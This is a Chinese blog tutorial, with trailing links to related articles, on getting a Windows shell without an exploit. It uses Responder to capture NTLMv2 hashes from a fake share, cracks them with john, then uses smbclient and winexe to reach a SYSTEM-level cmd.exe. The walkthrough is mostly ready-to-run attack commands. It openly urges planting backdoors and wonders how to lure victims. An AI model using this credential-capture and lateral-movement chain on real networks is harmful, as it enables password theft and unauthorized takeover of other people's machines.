这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。

我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可,
当然首先你先需要安装一下python环境和git工具

# apt-get intall build-essential git python-dev

然后是直接从git上克隆到本地

# git clone https://github.com/lgandx/Responder.git

等他下载完成然后需要进行一下更新(如果存在更新的话)

# cd Respondder/
#git pull

会出现一个
Already up-to-date(以更新到最新)

然后我们就可以使用啦!

ok,那我们开始正文!

那些什么-h啥的就不废话了,不会有人真的不知道吧

首先我们启动一个内网监听(需要先cd到responder文件夹下)

# ./Responder.py -wf -I eth0

-wf 应该是设定web代理 -I 指定网卡,这里我指定的是eth0,我们可以通过ifconfig指令查看自己的ip以及网卡信息,具体怎么添加删除一个网卡这里不再赘述,scdn一搜一大堆

如下图,开始监听了。

然后我们在任何windows系统访问一下虚假的共享文件地址,

<******>\\NOTAREALHOST\NOTARALSHARE\notarealfile.exe

会出现拒绝访问
然后我们的监听端就会出现一些奇妙的信息。

没错,我们抓到了我们的登录口令hash
然后我们q退出,运行

./DumpHash.py

会把我们抓到的hash导出成john可以处理的格式

这里我们抓到了两个hash,一个是我本机的登录口令,一个是我的虚拟机windows server 2012R2的登录口令hash
我们的根目录会生成两个txt文件,分别存储的是两个版本的hash,具体是什么版本在我们上一步导出时已经明确指出,如上图:时NTLMV2版本。

然后我们用我们的john进行指定版本hash爆破,爆破并不是百分百成功的。

john DumpNTLMv2.txt

现在我们能做的只有等。。。

获取到口令之后我们能干的事情就太多了,看22端口开了嘛,开了直接ssh连接,或者还有更强的,验证目标系统上是否存在ipc共享,如下:

smbclient -U [username]%[password] -L [ipaddress]

ok可以清楚的看到它开着,然后我们直接用kali自带工具winexe拿shell

winexe -U [username]%[password] --uninstall \\[ipaddress] cmd.exe

或者直接给他提升系统权限

winexe -U [username]%[password] --uninstall --system \\[ipaddress] cmd.exe

注意一定要带参数–unistall 不然会留下你的大猪蹄子的哦

直接就是系统权限,该留后门留后门,该干嘛干嘛就完事了,一次愉快的旅程,*但是有个问题,怎么诱导它访问共享文件呢?that is a question。 *

不利用系统漏洞拿shell,kali强大工具Responder相关推荐

  1. 【系统漏洞检测】Windows分析工具

    文章目录 一.Sherlock 二.PrivescCheck 三.Windows补丁在线查询 一.Sherlock GitHub:https://github.com/rasta-mouse/Sher ...

  2. SharpSCCM:一款利用SCCM实现横向渗透的强大工具

    关于SharpSCCM SharpSCCM是一款功能强大的横向渗透和凭证收集工具,该工具主要利用了微软终端配置管理器(SCCM)来实现其功能,并能够通过访问SCCM管理终端GUI来实现横向渗透和凭证收 ...

  3. 常见被病毒利用的漏洞补丁

    近期较忙,几乎没时间打理博客.近期遇到了很多利用系统漏洞传播的病毒,而且该漏洞都是以前很久发布的.为了方便自己同时也可以给广大朋友提供参考,将一些常见的系统漏洞信息及补丁收集在一起. MS03-026 ...

  4. 防范因编写代码产生的系统漏洞

    用于互联网服务的系统安全性是至关重要的.在过去的2018年,发生了多起用户信息泄密事件,其中不乏著名的互联网公司,攻击者都是利用系统漏洞获取用户的账号和密码,从而进一步获取用户的信息. 什么是系统漏洞 ...

  5. 最详细的系统漏洞扫描并对靶机进行利用攻击演练(模拟一次黑客白帽子操作)

    万万不可做坏事,仅为学习参考使用. 一.前提准备 1.所需条件: (1)kali2.0 linux 的iso文件(最好是32位,为安装nessus做好装备) 下载网址:https://www.kali ...

  6. 通过Kali利用serv-u漏洞获取win7系统管理员权限

    serv-u5.0.0.0版本下载链接:https://pan.baidu.com/s/1kRyByC1SbipRMrbLdd6f1w 提取码:m4of 环境说明 机器 ip地址 Kali主机 192 ...

  7. python dos攻击_利用SMB漏洞DoS攻击任何Windows系统

    原标题:利用SMB漏洞DoS攻击任何Windows系统 近日微软报出SMB V1存在漏洞,安全研究员并将此漏洞称作 " SMBLoris ",解释其能够发动拒绝服务(Dos)攻击, ...

  8. 新病毒仿熊猫烧香 利用 Vista系统漏洞疯狂传播

    3月31日,瑞星全球反病毒监测网截获一个与"熊猫烧香"非常相似的高危病毒,命名为"ANI蠕虫(Worm.DlOnlineGames.a)".该病毒不光传播和危害 ...

  9. 安全专家教你如何利用Uber系统漏洞无限制的免费乘坐?

    本文讲的是安全专家教你如何利用Uber系统漏洞无限制的免费乘坐?,近日,根据外媒报道,美国一名安全研究人员发现Uber上存在一处安全漏洞,允许发现这一漏洞的任何用户在全球范围内免费享受Uber乘车服务 ...

最新文章

  1. zedboard:使用ISE和modelsim搭建仿真环境
  2. oracle杀死进程时权限不足_在oracle中创建函数时权限不足
  3. C语言中的神兽strdup
  4. 使用matlab进行简单图像处理
  5. 批量创建钱包地址并保存私钥
  6. 抽象工厂模式(Abstract Factory Pattern)
  7. 分享咖啡基础知识——从咖啡小白到咖啡发烧友需要了解的那些事儿!
  8. SpringBoot项目,从创建到简单实战
  9. 北斗导航 | EagleEye2000:国产激光雷达走进测绘世界
  10. Pend Lists
  11. Windows下安装Cygwin及包管理器apt-cyg(转)
  12. MATLAB连接MYSQL搞数据
  13. C语言——大小写字母转换
  14. 在阿里云 ACK 上部署 EMQX MQTT 服务器集群
  15. vb 复制 剪贴板 html,用vb实现将脚本的输出复制到剪贴板
  16. 北京信息科技大学第十三届程序设计竞赛暨ACM选拔赛(重现赛)题解
  17. iOS偏好设置的存储注意事项
  18. sublime 正则跨行匹配
  19. MySQL参数binlog-do-db对binlogs写入的影响
  20. SCSI协议及大容量存储命令详解

热门文章

  1. 【计算机视觉40例】案例19:行人检测
  2. 进入Design House 揭秘手机设计痛苦过程
  3. 徕卡或于3月6日发布新款Q2相机
  4. 【Java面试题】MVC是什么?MVC设计模式的好处有哪些?
  5. linux的主要内容,linux视频教程主要内容
  6. FZU-1921 栀子花开(线段树)
  7. Midjourney免费账号
  8. JQuery 02 转换图片
  9. ffly-plus 又又又一个`gin` demo项目,带你快速上手用`gin`进行`web`开发!!!!
  10. 51单片机使用printf函数输出